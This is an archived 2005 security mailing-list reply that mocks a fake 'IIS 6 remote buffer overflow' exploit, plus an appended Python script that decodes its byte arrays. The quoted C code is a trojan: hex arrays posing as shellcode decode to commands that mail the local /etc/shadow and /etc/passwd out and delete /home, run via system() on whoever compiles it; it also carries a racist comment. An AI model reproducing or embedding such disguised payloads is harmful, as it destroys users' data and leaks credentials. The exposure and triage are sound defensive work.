Date: Tue Apr 19 02:14:17 2005
From: info16 at ifrance.com (Pbt)
Subject: IIS 6 Remote Buffer Overflow Exploit

On Monday 18 April 2005 at 16:53 -0700, Day Jay wrote:
> /* Proof of concept code
>    Please don't send us e-mails
>    asking us "how to hack" because
>    we will be forced to skullfsck you.
> 
> DISCLAIMER:
> !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
You're right to add this warning! :)

>   
>    Remote root.
> 
>    eg.
>    #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
>     + Connecting to host...
>     + Connected.
>     + Inserting Shellcode...
>     + Done...
>     + Spawning shell..
> 
>     Microsoft Windows XP [Version 5.1.2600]
>    (C) Copyright 1985-2001 Microsoft Corp.
>    C:\>
> 
> 
> 
> */
> #include <stdio.h>
> #include <stdlib.h>
> 
> /* Not machine code: these bytes are plain ASCII and decode to the
>    shell command line "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe" */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";
> 
> /* Decodes to "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk " */
> char launcher [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
> "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
> 
> /* Decodes to "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk " */
> char netcat_shell [] =
> "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
> "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
> "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
> "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
> "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
> "\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
Strange sc... :)

> int main(void)
> {
> 
> //Section Initialises designs implemented by mexicans
> //Imigrate


> /* All three run on the machine that executes this "exploit"; the host and
>    port given on the command line are never read, let alone connected to. */
> system(launcher);      /* mails the local /etc/shadow to the list */
> system(netcat_shell);  /* mails the local /etc/passwd to the list */
> system(shellcode);     /* deletes everything under /home on the local box */
Very stealthy, awesome!!


> //int socket = 0;
> //double long port = 0.0;
> 
> //#DEFINE port host address
> //#DEFINE number of inters
> //#DEFINE gull eeuEE
> 
>  //     for(int j; j < 30; j++)
>         {
>         //Find socket remote address fault
>         printf(".");
Did you forget to add a printf("Waiting for your root shell...\n");
here, huh?

>         }
> //overtake inetinfo here IIS_666666^
> return 0;
> }

OK, great work!
Don't forget to send us your tcp stack remote r00t h4x0r 0day
tomorrow :)

-- 
Pbt
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050419/32f93dab/attachment.bin
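The triage step this thread is really about, as an added example that is not part of the original post or of the PoC: before compiling anything posted as an exploit, decode every escaped byte array in the source and see where it flows. The script below takes the three arrays and three system() calls from the quoted post, embedded as a constructed string, resolves the \xHH escapes, labels each blob as binary or printable shell text, and records which sink receives it. The regular expressions, the command-word list and the is_local_payload heuristic are my own assumptions, not anything from the thread.

```python
import re

# Constructed sample, not a download: the three byte arrays and the three
# system() calls copied from the C source quoted above.
POC_SOURCE = r'''
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
system(launcher);
system(netcat_shell);
system(shellcode);
'''

# `char name[] = "..." "...";` with any number of adjacent string literals.
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
# Calls that hand a buffer to a shell or exec; such a buffer is never run as code.
SINK_RE = re.compile(r'\b(system|popen|execl|execv|execvp|execve)\s*\(\s*(\w+)')
# Command words that mark decoded text as a shell command line (assumed short list).
SHELL_WORD_RE = re.compile(r'(^|[;|&\s/])(rm|cat|mail|nc|sh|bash|echo|wget|curl|chmod|dd)\b')
SIMPLE_ESCAPES = {'n': 0x0a, 't': 0x09, 'r': 0x0d, '0': 0x00, '\\': 0x5c, '"': 0x22, "'": 0x27}


def decode_c_literals(literals: str) -> bytes:
    """Concatenate adjacent C string literals and resolve \\xHH plus the common escapes."""
    out = bytearray()
    for body in re.findall(r'"((?:[^"\\]|\\.)*)"', literals):
        i = 0
        while i < len(body):
            if body[i] != '\\':
                out.append(ord(body[i]))
                i += 1
                continue
            nxt = body[i + 1]
            if nxt == 'x':
                # C's \x consumes every hex digit that follows, so > 0xff is a compile error.
                m = re.match(r'[0-9a-fA-F]+', body[i + 2:])
                if not m or int(m.group(0), 16) > 0xff:
                    raise ValueError(f"bad \\x escape at offset {i}")
                out.append(int(m.group(0), 16))
                i += 2 + len(m.group(0))
            elif nxt in SIMPLE_ESCAPES:
                out.append(SIMPLE_ESCAPES[nxt])
                i += 2
            else:
                raise ValueError(f"unsupported escape \\{nxt}")
    return bytes(out)


def classify(data: bytes) -> str:
    """'binary' if any byte lies outside printable ASCII, else shell-command or printable-text."""
    if not all(0x20 <= b < 0x7f or b in (0x09, 0x0a, 0x0d) for b in data):
        return "binary"
    return "shell-command" if SHELL_WORD_RE.search(data.decode("ascii")) else "printable-text"


def triage(source: str) -> dict:
    """Decode every char[] array in a PoC and record what it is and which sink receives it."""
    sinks = {}
    for func, arg in SINK_RE.findall(source):
        sinks.setdefault(arg, []).append(func)
    report = {}
    for name, literals in ARRAY_RE.findall(source):
        data = decode_c_literals(literals)
        report[name] = {
            "decoded": data.decode("ascii", errors="replace"),
            "kind": classify(data),
            "passed_to": sinks.get(name, []),
        }
    return report


def is_local_payload(report: dict) -> bool:
    """Shell text handed straight to system() runs on whoever compiles the PoC, not on a target."""
    return any(r["kind"] == "shell-command" and "system" in r["passed_to"] for r in report.values())


if __name__ == "__main__":
    rep = triage(POC_SOURCE)
    for name, r in rep.items():
        print(f"{name:13} {r['kind']:14} -> {r['passed_to']}  {r['decoded']!r}")
    print("verdict:", "local payload disguised as shellcode" if is_local_payload(rep) else "inconclusive")
```

Run as-is it prints each array's decoded text, its kind and the sink that receives it: all three decode to printable shell command lines and go straight to system(), while main() never reads the host and port from the command line. Genuine position-independent shellcode usually contains bytes outside printable ASCII and is classified as binary here; an alphanumeric encoder can defeat that test, so the sink check (is the buffer ever cast to a function pointer or written into a packet, or only handed to a shell?) is the one to trust.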
